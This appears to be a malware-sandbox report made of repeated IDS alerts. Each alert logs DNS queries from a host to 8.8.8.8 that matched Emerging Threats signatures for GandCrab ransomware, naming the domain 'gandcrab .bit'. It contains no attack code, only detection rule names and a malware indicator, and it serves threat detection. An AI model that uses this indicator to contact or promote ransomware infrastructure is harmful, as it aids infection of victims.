ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856619532026737 09/01/22-00:02:49.126045
SID:	2026737
Source Port:	56619
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852112532026737 09/01/22-00:03:20.284135
SID:	2026737
Source Port:	52112
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865198532829500 09/01/22-00:02:04.768621
SID:	2829500
Source Port:	65198
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853848532829498 09/01/22-00:01:59.462827
SID:	2829498
Source Port:	53848
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851893532026737 09/01/22-00:03:32.036713
SID:	2026737
Source Port:	51893
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854433532829498 09/01/22-00:03:35.979601
SID:	2829498
Source Port:	54433
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853310532829500 09/01/22-00:01:54.940366
SID:	2829500
Source Port:	53310
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859438532026737 09/01/22-00:01:57.681285
SID:	2026737
Source Port:	59438
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861421532829498 09/01/22-00:02:03.043258
SID:	2829498
Source Port:	61421
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852458532026737 09/01/22-00:03:02.844406
SID:	2026737
Source Port:	52458
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855652532829498 09/01/22-00:03:19.259211
SID:	2829498
Source Port:	55652
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861130532829498 09/01/22-00:03:15.942186
SID:	2829498
Source Port:	61130
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860421532829498 09/01/22-00:03:32.382333
SID:	2829498
Source Port:	60421
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864973532829500 09/01/22-00:03:05.661525
SID:	2829500
Source Port:	64973
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863567532026737 09/01/22-00:02:17.089606
SID:	2026737
Source Port:	63567
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865463532829500 09/01/22-00:03:37.309587
SID:	2829500
Source Port:	65463
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865389532026737 09/01/22-00:02:38.719558
SID:	2026737
Source Port:	65389
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853040532026737 09/01/22-00:03:06.300781
SID:	2026737
Source Port:	53040
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857827532829500 09/01/22-00:03:22.978908
SID:	2829500
Source Port:	57827
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853039532026737 09/01/22-00:03:06.280270
SID:	2026737
Source Port:	53039
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859585532026737 09/01/22-00:02:11.746820
SID:	2026737
Source Port:	59585
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857708532829500 09/01/22-00:01:42.729663
SID:	2829500
Source Port:	57708
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851142532829498 09/01/22-00:01:24.090037
SID:	2829498
Source Port:	51142
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853433532829498 09/01/22-00:02:18.458138
SID:	2829498
Source Port:	53433
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860093532829500 09/01/22-00:02:16.558554
SID:	2829500
Source Port:	60093
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849206532026737 09/01/22-00:02:46.717208
SID:	2026737
Source Port:	49206
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851143532829498 09/01/22-00:01:24.124615
SID:	2829498
Source Port:	51143
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854158532829498 09/01/22-00:02:39.772185
SID:	2829498
Source Port:	54158
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859376532829500 09/01/22-00:02:48.263272
SID:	2829500
Source Port:	59376
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864825532829500 09/01/22-00:02:24.749273
SID:	2829500
Source Port:	64825
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864273532829498 09/01/22-00:03:00.036817
SID:	2829498
Source Port:	64273
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851894532026737 09/01/22-00:03:32.055555
SID:	2026737
Source Port:	51894
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854434532829498 09/01/22-00:03:36.001169
SID:	2829498
Source Port:	54434
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859768532026737 09/01/22-00:03:34.095324
SID:	2026737
Source Port:	59768
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853054532829498 09/01/22-00:02:15.078816
SID:	2829498
Source Port:	53054
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863448532829498 09/01/22-00:02:35.455212
SID:	2829498
Source Port:	63448
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865111532829500 09/01/22-00:01:46.954181
SID:	2829500
Source Port:	65111
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853627532026737 09/01/22-00:02:01.832804
SID:	2026737
Source Port:	53627
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865200532829500 09/01/22-00:02:04.820486
SID:	2829500
Source Port:	65200
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855461532829498 09/01/22-00:03:07.325312
SID:	2829498
Source Port:	55461
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865390532026737 09/01/22-00:02:38.738598
SID:	2026737
Source Port:	65390
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865516532829500 09/01/22-00:02:19.492210
SID:	2829500
Source Port:	65516
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855654532829498 09/01/22-00:03:19.297074
SID:	2829498
Source Port:	55654
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854288532829500 09/01/22-00:03:33.756470
SID:	2829500
Source Port:	54288
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865515532829500 09/01/22-00:02:19.472414
SID:	2829500
Source Port:	65515
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859767532026737 09/01/22-00:03:34.075907
SID:	2026737
Source Port:	59767
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860649532829498 09/01/22-00:03:25.341169
SID:	2829498
Source Port:	60649
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853628532026737 09/01/22-00:02:01.851234
SID:	2026737
Source Port:	53628
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864970532829500 09/01/22-00:02:44.867082
SID:	2829500
Source Port:	64970
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862434532026737 09/01/22-00:02:57.492445
SID:	2026737
Source Port:	62434
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859583532026737 09/01/22-00:02:11.706174
SID:	2026737
Source Port:	59583
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850232532026737 09/01/22-00:02:54.777871
SID:	2026737
Source Port:	50232
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852959532829500 09/01/22-00:01:25.367458
SID:	2829500
Source Port:	52959
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850787532026737 09/01/22-00:02:43.367194
SID:	2026737
Source Port:	50787
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858123532829498 09/01/22-00:02:27.969558
SID:	2829498
Source Port:	58123
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860423532829498 09/01/22-00:03:32.424188
SID:	2829498
Source Port:	60423
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865201532829500 09/01/22-00:02:04.842170
SID:	2829500
Source Port:	65201
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854157532829498 09/01/22-00:02:39.751533
SID:	2829498
Source Port:	54157
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865112532829500 09/01/22-00:01:46.974641
SID:	2829500
Source Port:	65112
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859830532829500 09/01/22-00:02:55.974495
SID:	2829500
Source Port:	59830
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855460532829498 09/01/22-00:03:07.301197
SID:	2829498
Source Port:	55460
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853307532829500 09/01/22-00:01:54.875889
SID:	2829500
Source Port:	53307
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851595532026737 09/01/22-00:03:26.929732
SID:	2026737
Source Port:	51595
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856044532829500 09/01/22-00:01:38.460693
SID:	2829500
Source Port:	56044
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857828532829500 09/01/22-00:03:23.000023
SID:	2829500
Source Port:	57828
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864606532829500 09/01/22-00:02:41.903320
SID:	2829500
Source Port:	64606
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853273532829498 09/01/22-00:02:55.304130
SID:	2829498
Source Port:	53273
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856047532829500 09/01/22-00:01:38.529181
SID:	2829500
Source Port:	56047
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850626532026737 09/01/22-00:03:18.717464
SID:	2026737
Source Port:	50626
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863691532829498 09/01/22-00:03:21.687512
SID:	2829498
Source Port:	63691
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859825532026737 09/01/22-00:02:20.014612
SID:	2026737
Source Port:	59825
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855954532829500 09/01/22-00:03:25.612012
SID:	2829500
Source Port:	55954
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862428532026737 09/01/22-00:03:13.188986
SID:	2026737
Source Port:	62428
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861419532829498 09/01/22-00:02:03.004767
SID:	2829498
Source Port:	61419
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860474532829498 09/01/22-00:02:47.119975
SID:	2829498
Source Port:	60474
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864274532829498 09/01/22-00:03:00.057400
SID:	2829498
Source Port:	64274
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853853532026737 09/01/22-00:01:50.543832
SID:	2026737
Source Port:	53853
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855248532829498 09/01/22-00:03:03.486266
SID:	2829498
Source Port:	55248
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853432532829498 09/01/22-00:02:18.428585
SID:	2829498
Source Port:	53432
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853849532829498 09/01/22-00:01:59.483040
SID:	2829498
Source Port:	53849
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859586532026737 09/01/22-00:02:11.767488
SID:	2026737
Source Port:	59586
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860477532829498 09/01/22-00:02:47.180255
SID:	2829498
Source Port:	60477
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852743532026737 09/01/22-00:03:23.998658
SID:	2026737
Source Port:	52743
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849170532829500 09/01/22-00:02:32.467435
SID:	2829500
Source Port:	49170
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865325532026737 09/01/22-00:01:43.903174
SID:	2026737
Source Port:	65325
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857575532829498 09/01/22-00:01:53.271847
SID:	2829498
Source Port:	57575
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849879532829500 09/01/22-00:02:36.072251
SID:	2829500
Source Port:	49879
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859640532026737 09/01/22-00:01:39.971866
SID:	2026737
Source Port:	59640
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865109532829500 09/01/22-00:01:46.914019
SID:	2829500
Source Port:	65109
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863450532829498 09/01/22-00:02:35.496675
SID:	2829498
Source Port:	63450
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860646532829498 09/01/22-00:03:25.281760
SID:	2829498
Source Port:	60646
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854285532829500 09/01/22-00:03:33.695070
SID:	2829500
Source Port:	54285
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858915532829500 09/01/22-00:03:18.040653
SID:	2829500
Source Port:	58915
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864974532829500 09/01/22-00:03:05.683602
SID:	2829500
Source Port:	64974
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858482532829500 09/01/22-00:03:29.362481
SID:	2829500
Source Port:	58482
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864125532829498 09/01/22-00:02:44.347197
SID:	2829498
Source Port:	64125
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859437532026737 09/01/22-00:01:57.658266
SID:	2026737
Source Port:	59437
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857137532829498 09/01/22-00:01:34.192981
SID:	2829498
Source Port:	57137
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860819532829500 09/01/22-00:03:08.807703
SID:	2829500
Source Port:	60819
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864598532829498 09/01/22-00:02:22.069673
SID:	2829498
Source Port:	64598
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

